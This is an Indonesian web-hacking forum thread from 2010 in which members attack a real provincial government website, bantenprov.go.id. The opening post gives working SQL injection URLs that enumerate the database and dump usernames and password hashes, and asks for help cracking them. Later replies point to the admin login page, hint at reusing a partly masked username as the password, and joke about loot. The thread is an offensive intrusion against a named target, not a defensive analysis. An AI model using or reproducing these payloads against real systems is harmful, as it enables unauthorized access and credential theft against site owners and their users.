hole di http://bantenprov.go.id/ untuk sqli

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

hole di http://bantenprov.go.id/ untuk sqli

Post by cyber_criminal » Tue May 11, 2010 8:58 pm

thread ini saya buat untuk menggantikan postingan saya tentang sqli di http://www.nexian.co.id/,
ok langsung aja, karena bug sqli di situs di http://www.nexian.co.id/ udah di patch maka saya coba nyari situs yg lain, terus ketemu deh bug sqli di http://bantenprov.go.id/

ini dia holenya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=6932'
trus saya injeksi, dpat deh isi tablenya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Image

ini isi column dari table pengguna

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28column_name%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20information_schema.columns%20where%20table_name=0x70656e6767756e61%20%20--
Image

dan ini dia hasilnya

Code: Select all

http://bantenprov.go.id/get_page.php?link=brt_dtl&id=-6932%20union%20select%20all%201,2,3,4,group_concat%28user_name,0x3a,password%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20pengguna
Image

tapi sayangnya saya belum dapat login pagenya dan hashnya tidak berhasil saya crack, tolong bantuannya ya
:kaca: :kaca: :kaca:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: hole di http://bantenprov.go.id/ untuk sqli

Post by 3xtr3m3b0y » Wed May 12, 2010 7:13 am

Search with Google using this keyword:
login site:bantenprov.go.id
...n0 l1m17...

cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: hole di http://bantenprov.go.id/ untuk sqli

Post by cyber_criminal » Wed May 12, 2010 8:16 am

hashnya sulit di crack mas
:cry: :cry: :cry:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

win32error
Posts: 6
Joined: Thu May 13, 2010 1:35 am

Re: hole di http://bantenprov.go.id/ untuk sqli

Post by win32error » Thu May 13, 2010 9:07 pm

monggo modah2an membantu :licik:
coba deh masuk nya lewat page ini http://banten.go.id/admin
itu page login web nya..ada dua domain nya..yang buat page login nya yang di atas nah buat tampilan depan nya yang http://bantenprov.go.id
usernya pake yang az*s passnya idem

User avatar
3xtr3m3b0y
Posts: 317
Joined: Wed Apr 22, 2009 5:11 pm
Location: ~[Hacked Machine]~
Contact:

Re: hole di http://bantenprov.go.id/ untuk sqli

Post by 3xtr3m3b0y » Fri May 14, 2010 8:39 am

win32error wrote:monggo modah2an membantu :licik:
coba deh masuk nya lewat page ini http://banten.go.id/admin
itu page login web nya..ada dua domain nya..yang buat page login nya yang di atas nah buat tampilan depan nya yang http://bantenprov.go.id
usernya pake yang az*s passnya idem

Code: Select all

$nslookup banten.go.id
Non-authoritative answer:
Name:	banten.go.id
Address: 69.175.104.74

$nslookup bantenprov.go.id
Non-authoritative answer:
Name:	bantenprov.go.id
Address: 118.97.113.84
Jumping machine to machine...???
Itu cmn di redirect dari web lama ke yg baru
...n0 l1m17...

win32error
Posts: 6
Joined: Thu May 13, 2010 1:35 am

Re: hole di http://bantenprov.go.id/ untuk sqli

Post by win32error » Fri May 14, 2010 9:43 am

jadi gitu to ... :circle:

cyber_criminal
Posts: 145
Joined: Wed Apr 07, 2010 8:55 pm

Re: hole di http://bantenprov.go.id/ untuk sqli

Post by cyber_criminal » Fri May 14, 2010 10:37 pm

terima kasih atas pencerahannya,
:malumalu: :malumalu: :malumalu:

tapi hashnya masih belum berhasil saya crack
:kaca: :kaca: :kaca:
Hacking bukanlah ttng jawaban. Hacking adalah ttng jalan yang kmu ambil untuk mencari jawaban. jika kmu membutuhkan bantuan, jngan bertanya utk mendapatkan jawaban, bertanyalah ttng jalan yang harus kmu ambil utk mencari jawaban utk dirimu sendiri.

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: hole di http://bantenprov.go.id/ untuk sqli

Post by Digital Cat » Fri May 14, 2010 11:29 pm

wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

cyber_terror1st
Posts: 144
Joined: Fri Apr 30, 2010 8:35 pm

Re: hole di http://bantenprov.go.id/ untuk sqli

Post by cyber_terror1st » Sat May 15, 2010 9:24 pm

Digital Cat wrote:wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

hahahah
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:
mantap kk digital cat
:malumalu: :malumalu:
i'm cyber_terror1st and i proud what i suppoust to be

User avatar
juara1
Posts: 42
Joined: Thu Jul 24, 2008 1:02 am
Location: http://ju4ra.me
Contact:

Re: hole di http://bantenprov.go.id/ untuk sqli

Post by juara1 » Sun May 16, 2010 7:28 am

cyber_terror1st wrote:
Digital Cat wrote:wah..
serius bener nih ama site banten..

kalo boleh tau..

ada file/data bagus tah di site banten..

ada file hentai gak ya di site itu..

:ngakak:

hahahah
:ngakak: :ngakak: :ngakak: :ngakak: :ngakak:
mantap kk digital cat
:malumalu: :malumalu:
kalo ada duitnya c monggo2 aja .. hehehehe :ngakak: :ngakak:
asuuuuuuuuu

Post Reply

Return to “Web Hacking”